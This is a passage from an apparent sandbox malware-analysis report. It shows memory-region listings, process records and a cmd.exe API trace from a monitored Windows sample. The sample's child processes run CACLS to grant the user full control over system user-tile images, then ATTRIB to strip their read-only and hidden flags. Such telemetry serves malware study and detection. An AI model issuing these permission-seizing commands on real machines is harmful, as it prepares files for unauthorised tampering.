region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26147 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26148 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 26149 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 26150 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26151 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26152 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26153 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26154 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26155 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 
26156 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 519 os_tid = 0xd4c Thread: id = 520 os_tid = 0xd34 Process: id = "363" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16a80" os_pid = "0xcf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "361" os_parent_pid = "0x5d0" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26157 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26158 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26159 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26160 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 26161 start_va = 0x4b0000 end_va = 0x4b6fff entry_point = 0x4b0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 26162 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = 
"ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26163 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26164 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26165 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 26166 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26167 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26168 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26169 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26170 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 26171 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 26172 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 26173 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = 
"\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26174 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26175 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26176 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26177 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26178 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26179 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26180 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26181 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26182 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 
region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26183 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26184 start_va = 0x1b0000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 26185 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26186 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 521 os_tid = 0xea4 Process: id = "364" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xfd0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26187 start_va = 0x10000 end_va = 0x2ffff 
entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26188 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26189 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26190 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 26191 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 26192 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26193 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26194 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26195 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26196 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26197 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26198 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = 
"" Region: id = 26199 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26200 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 26201 start_va = 0x560000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 26202 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 26203 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26204 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26205 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26206 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26207 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26208 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = 
mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26209 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26210 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26211 start_va = 0x3c0000 end_va = 0x487fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 26212 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26213 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 26214 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 26215 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 26216 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 26217 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 26218 start_va = 0x570000 end_va = 0x670fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 26219 start_va = 0x680000 end_va = 0x127ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000680000" filename = "" Region: id = 26220 start_va = 0x1280000 end_va = 0x13e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001280000" filename = "" Region: id = 26221 start_va = 0x13f0000 end_va = 0x16befff entry_point = 0x13f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 522 os_tid = 0x5e0 [0184.416] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afc8c | out: lpSystemTimeAsFileTime=0x1afc8c*(dwLowDateTime=0xa2d1cc40, dwHighDateTime=0x1d440a9)) [0184.416] GetCurrentProcessId () returned 0xfd0 [0184.416] GetCurrentThreadId () returned 0x5e0 [0184.416] GetTickCount () returned 0x34c4b [0184.416] QueryPerformanceCounter (in: lpPerformanceCount=0x1afc84 | out: lpPerformanceCount=0x1afc84*=24120516052) returned 1 [0184.417] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0184.417] __set_app_type (_Type=0x1) [0184.417] __p__fmode () returned 0x76b331f4 [0184.417] __p__commode () returned 0x76b331fc [0184.417] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0184.417] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0184.417] GetCurrentThreadId () returned 0x5e0 [0184.417] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x5e0) returned 0x38 [0184.417] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0184.417] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0184.417] SetThreadUILanguage (LangId=0x0) returned 0x409 [0184.417] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0184.417] RegOpenKeyExW (in: hKey=0x80000001, 
lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afc1c | out: phkResult=0x1afc1c*=0x0) returned 0x2 [0184.417] VirtualQuery (in: lpAddress=0x1afc53, lpBuffer=0x1afbec, dwLength=0x1c | out: lpBuffer=0x1afbec*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0184.418] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afbec, dwLength=0x1c | out: lpBuffer=0x1afbec*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0184.418] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afbec, dwLength=0x1c | out: lpBuffer=0x1afbec*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0184.418] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afbec, dwLength=0x1c | out: lpBuffer=0x1afbec*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0184.418] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afbec, dwLength=0x1c | out: lpBuffer=0x1afbec*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0184.418] GetConsoleOutputCP () returned 0x1b5 [0184.418] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0184.418] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0184.418] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.418] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0184.418] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.418] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0184.418] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.418] 
SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0184.418] _get_osfhandle (_FileHandle=0) returned 0x3 [0184.418] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0184.419] _get_osfhandle (_FileHandle=0) returned 0x3 [0184.419] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0184.419] GetEnvironmentStringsW () returned 0x2d0308* [0184.419] FreeEnvironmentStringsW (penv=0x2d0308) returned 1 [0184.419] GetEnvironmentStringsW () returned 0x2d0308* [0184.419] FreeEnvironmentStringsW (penv=0x2d0308) returned 1 [0184.419] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aeb8c | out: phkResult=0x1aeb8c*=0x40) returned 0x0 [0184.419] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x0, lpData=0x1aeb98*=0xb8, lpcbData=0x1aeb90*=0x1000) returned 0x2 [0184.419] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x4, lpData=0x1aeb98*=0x1, lpcbData=0x1aeb90*=0x4) returned 0x0 [0184.419] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x0, lpData=0x1aeb98*=0x1, lpcbData=0x1aeb90*=0x1000) returned 0x2 [0184.419] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x4, lpData=0x1aeb98*=0x0, lpcbData=0x1aeb90*=0x4) returned 0x0 [0184.419] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x4, lpData=0x1aeb98*=0x40, lpcbData=0x1aeb90*=0x4) returned 0x0 [0184.420] 
RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x4, lpData=0x1aeb98*=0x40, lpcbData=0x1aeb90*=0x4) returned 0x0 [0184.420] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x0, lpData=0x1aeb98*=0x40, lpcbData=0x1aeb90*=0x1000) returned 0x2 [0184.420] RegCloseKey (hKey=0x40) returned 0x0 [0184.420] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aeb8c | out: phkResult=0x1aeb8c*=0x40) returned 0x0 [0184.420] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x0, lpData=0x1aeb98*=0x40, lpcbData=0x1aeb90*=0x1000) returned 0x2 [0184.420] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x4, lpData=0x1aeb98*=0x1, lpcbData=0x1aeb90*=0x4) returned 0x0 [0184.420] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x0, lpData=0x1aeb98*=0x1, lpcbData=0x1aeb90*=0x1000) returned 0x2 [0184.420] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x4, lpData=0x1aeb98*=0x0, lpcbData=0x1aeb90*=0x4) returned 0x0 [0184.420] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x4, lpData=0x1aeb98*=0x9, lpcbData=0x1aeb90*=0x4) returned 0x0 [0184.420] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", 
lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x4, lpData=0x1aeb98*=0x9, lpcbData=0x1aeb90*=0x4) returned 0x0 [0184.420] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x0, lpData=0x1aeb98*=0x9, lpcbData=0x1aeb90*=0x1000) returned 0x2 [0184.420] RegCloseKey (hKey=0x40) returned 0x0 [0184.420] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886392 [0184.420] srand (_Seed=0x5b886392) [0184.420] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\"" [0184.420] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\"" [0184.420] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0184.421] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2d1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0184.421] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0184.421] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0184.421] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, 
nSize=0x2000 | out: lpBuffer="") returned 0x0 [0184.421] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0184.421] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0184.421] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0184.421] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0184.421] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0184.421] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0184.421] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0184.421] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0184.421] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0184.421] GetEnvironmentStringsW () returned 0x2d2458* [0184.421] FreeEnvironmentStringsW (penv=0x2d2458) returned 1 [0184.421] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.421] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0184.421] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0184.421] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0184.421] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0184.421] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0184.421] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0184.421] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0184.422] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0184.422] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0184.422] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af958 | out: 